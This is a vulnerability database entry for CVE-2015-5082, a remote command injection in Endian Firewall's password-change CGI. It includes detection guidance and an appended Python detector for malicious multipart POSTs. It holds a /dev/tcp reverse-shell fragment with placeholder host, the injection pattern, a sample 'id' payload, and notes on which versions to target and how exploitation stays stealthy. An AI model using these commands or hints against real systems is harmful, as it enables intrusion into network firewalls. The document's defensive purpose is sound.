cbcvebase.
CVE-2015-5082
published 2015-09-28


Priority: P2 (76)
CVSS 2.0: 10 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 69.91% (99.3rd percentile)
Endian Firewall before 3.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) NEW_PASSWORD_1 or (2) NEW_PASSWORD_2 parameter to cgi-bin/chpasswd.cgi.

Affected (1 range)

Vendor: endian_firewall
Product: endian_firewall
Version range: <= 2.5.1
Fixed in: (not listed)

Detection & IOCs (extracted from sources)

path: /cgi-bin/chpasswd.cgi
path: /usr/local/bin/chrootpasswd
port: 10443
command: /dev/tcp/<reverseShellIP>/<reverseShellPort> 0>&1;
  • Detect POST requests to /cgi-bin/chpasswd.cgi with multipart/form-data bodies containing shell metacharacters (e.g., semicolons, pipes) in the NEW_PASSWORD_1 or NEW_PASSWORD_2 fields.
  • The exploit payload is injected as: <EFW_PASSWORD>; <cmd>; — look for semicolon-delimited command injection patterns in the NEW_PASSWORD_1/NEW_PASSWORD_2 multipart form fields.
  • Monitor for POST requests to /cgi-bin/chpasswd.cgi over HTTPS on port 10443 (the default Endian Firewall proxy management port).
  • Alert on execution of /usr/local/bin/chrootpasswd by the 'nobody' account, which indicates post-exploitation privilege escalation via sudo on a compromised Endian Firewall.
  • Detect outbound /dev/tcp reverse shell connections initiated from the Endian Firewall host (nobody process spawning a bash reverse shell via /dev/tcp).
  • Versions >= 3.0.0 contain the vulnerable code but it is never executed due to a bug in the CGI script; exploitation is not possible on these versions.
  • Versions 2.3.x and 2.4.0 are also not exploitable due to a separate bug in the CGI script.
  • Very early versions (e.g., 1.1 RC5) additionally require HTTP Basic Auth credentials to exploit; use USERNAME/PASSWORD options when targeting these versions.
  • The exploit does NOT change the proxy user's password on vulnerable systems, so exploitation may be stealthy with no visible account change.
  • Confirmed vulnerable EFW Community versions are 1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2; any version from 1.1 RC5 to 2.2.x and 2.4.1/2.5.x should be considered at risk.
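As an added defender-side example (not code from the cbcvebase page or from Endian), the following Python implements the check the first two bullets describe: a POST to /cgi-bin/chpasswd.cgi whose multipart NEW_PASSWORD_1 or NEW_PASSWORD_2 field carries shell metacharacters. The request bytes are a constructed sample; the path and field names are those listed above, and the metacharacter set beyond semicolon and pipe is my assumption.

```python
import re
from email import policy
from email.parser import BytesParser

TARGET_PATH = "/cgi-bin/chpasswd.cgi"
WATCHED_FIELDS = ("NEW_PASSWORD_1", "NEW_PASSWORD_2")
SHELL_META = re.compile(r"[;|&`$\n]")  # ';' and '|' per the advisory; the rest are assumed extras

def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def multipart_fields(content_type: str, body: bytes) -> dict:
    """Map form field name -> value using the stdlib MIME parser (no web framework needed)."""
    msg = BytesParser(policy=policy.default).parsebytes(
        b"Content-Type: " + content_type.encode("latin-1") + b"\r\n\r\n" + body)
    fields = {}
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        if name:
            fields[name] = part.get_content().rstrip("\r\n")
    return fields

def check_request(raw: bytes) -> list:
    """Return the watched fields that carry shell metacharacters; [] means nothing to alert on."""
    method, path, headers, body = parse_request(raw)
    ctype = headers.get("content-type", "")
    if method != "POST" or path.split("?")[0] != TARGET_PATH or not ctype.startswith("multipart/form-data"):
        return []
    fields = multipart_fields(ctype, body)
    return [f for f in WATCHED_FIELDS if f in fields and SHELL_META.search(fields[f])]

# Constructed sample capture (not real traffic) in the "<password>; <cmd>;" shape the advisory describes.
SAMPLE_POST = (
    b"POST /cgi-bin/chpasswd.cgi HTTP/1.1\r\n"
    b"Host: 192.0.2.10:10443\r\n"
    b"Content-Type: multipart/form-data; boundary=----EFWBoundary\r\n\r\n"
    b"------EFWBoundary\r\nContent-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\nS3cret; id;\r\n"
    b"------EFWBoundary\r\nContent-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\nS3cret\r\n"
    b"------EFWBoundary--\r\n"
)

if __name__ == "__main__":
    print(check_request(SAMPLE_POST))  # ['NEW_PASSWORD_1']
```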